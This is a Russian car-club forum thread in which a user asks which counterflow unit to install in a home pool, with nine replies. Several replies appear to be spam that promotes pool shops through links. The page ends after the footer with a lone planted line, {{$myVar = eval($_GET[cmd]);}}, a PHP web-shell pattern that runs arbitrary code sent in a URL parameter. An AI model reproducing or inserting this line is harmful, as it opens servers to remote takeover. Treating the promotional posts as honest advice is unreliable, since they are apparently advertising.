+ Ответить в теме
Показано с 1 по 10 из 10

Тема: Бассейн


  1. #1
    Мимо проходил Oxoxo is on a distinguished road Аватар для Oxoxo
    Регистрация
    13.02.2019
    Сообщений
    12

    Бассейн

    Привет всем Хочу построить бассейн в доме. Помещение уже есть, но никак не хватало средств, чтобы все организовать. Так вот, хочу установить противоток в бассейне. Какой лучше выбрать? Кто разбирается?

  2. #2
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11
    Я дума,что в Вашем случае стоит переговорить с профессионалами. Вы же все равно сами не будете заниматься строительством и установкой? Вот и обратитесь к Вашему мастеру.

  3. #3
    Мимо проходил Hommy is on a distinguished road Аватар для Hommy
    Регистрация
    18.12.2018
    Откуда
    ...
    Машина
    Бричка
    Сообщений
    10
    Добрый день! А Вы планируете заниматься в бассейне? Иначе смысла нет ставить такое оборудование. Я думаю, что для домашнего использования мощные выбирать не стоит, скорее всего подойдет 53 км/ч. Что касается марки, то к вот здесь к примеру можно купить противотоки марки Аквасектор https://glavpooltorg.su/category/pro...ki-akvasektor/

  4. #4
    Мимо проходил Trety is on a distinguished road Аватар для Trety
    Регистрация
    17.12.2018
    Сообщений
    8
    Попробуйте узнать у компании Акваника. Они занимаются оборудованием для бассейнов. Я думаю, что стоит переговорить с консультантом. А выбирать стоит опираясь ан объем бассейна.

  5. #5
    Мимо проходил Trion is on a distinguished road Аватар для Trion
    Регистрация
    29.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    Туда полезно ходить

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Несколько недель назад приобрел и бассейн, и буду отправлять его через несколько дней на дачу. Круглый каркасный бассейн intex https://restmart.ru/bassejny-sbornye...asnye-kruglye/ купил по совету своего друга. У него уже стоит бассейн на даче и он приобрёл его ещё в том году. Я тоже в этом году решил последовать его совету и приобрел такой бассейн в компании, которая продает отличные и замечательные бассейны. Как мне сказал друг, он очень легко собирается и очень быстро наполняется водой. Я думаю, что мои дети с большим удовольствием будут в нём плескаться всё лето, собственно и мы с женой тоже будем присоединяться. Так как по рассказам моего друга, бассейн это просто чудо из чудес, который помогает в очень жаркие дни.

  7. #7
    Мимо проходил Shafralik is on a distinguished road Аватар для Shafralik
    Регистрация
    28.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    Вы же все равно сами не будете заниматься строительством и установкой? Вот и обратитесь к Вашему мастеру.

  8. #8
    Мимо проходил Dabamer is on a distinguished road Аватар для Dabamer
    Регистрация
    30.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Да карсник реально покупать и заказывать монтаж в одном месте. Сам купил бассейн в фирме /catalog/kruglye-karkasnye-bassejny и они мне его за день и поставили. Там сложного ничего нет и можно купаться в любое время.

  9. #9
    GTI-Racing Semen Leonidovich is on a distinguished road Аватар для Semen Leonidovich
    Регистрация
    05.04.2020
    Откуда
    Мск
    Машина
    Бричка
    Сообщений
    249
    Если у вас есть проблемы с бассейном, рекомендую вот такую службу по чистке этих бассейнов https://centr-bassein.ru/
    Довольно хорошая служба, которая вам поможет.

  10. #10
    Новичок HaTali is on a distinguished road Аватар для HaTali
    Регистрация
    15.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    115
    У нас на даче пока только надувной бассейн, мы его два года назад вот здесь https://sportcity74.ru/sad-i-ogorod/..._naduvnye.html для детей взяли, выбрали большой, диаметром почти пять метров, чтобы и нам тоже можно было покупаться. Так вот он уже два лета нам прослужил и пока бассейн в отличном состоянии, надеюсь, он нас еще долго летом радовать будет.

+ Ответить в теме

Похожие темы

  1. Бассейн под мост
    от Alexandr 922 в разделе Клубная Тема
    Ответов: 22
    Последнее сообщение: 20.07.2010, 22:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}